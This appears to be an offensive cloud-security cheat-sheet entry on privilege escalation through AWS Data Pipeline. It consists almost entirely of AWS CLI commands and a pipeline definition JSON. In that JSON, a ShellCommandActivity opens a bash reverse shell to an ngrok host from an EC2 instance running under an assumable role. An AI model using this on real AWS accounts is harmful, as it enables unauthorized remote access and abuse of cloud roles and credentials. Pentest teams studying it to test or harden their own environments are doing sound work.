AWS - Datapipeline Privesc

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

{
     "objects": [
     {
         "id" : "CreateDirectory",
         "type" : "ShellCommandActivity",
         "command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
         "runsOn" : {"ref": "instance"}
     },
     {
         "id": "Default",
         "scheduleType": "ondemand",
         "failureAndRerunMode": "CASCADE",
         "name": "Default",
         "role": "assumable_datapipeline",
         "resourceRole": "assumable_datapipeline"
     },
     {
         "id" : "instance",
         "name" : "instance",
         "type" : "Ec2Resource",
         "actionOnTaskFailure" : "terminate",
         "actionOnResourceFailure" : "retryAll",
         "maximumRetries" : "1",
         "instanceType" : "t2.micro",
         "securityGroups" : ["default"],
         "role" : "assumable_datapipeline",
         "resourceRole" : "assumable_ec2_profile_instance"
     }]
}

aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
    --pipeline-definition file:///pipeline/definition.json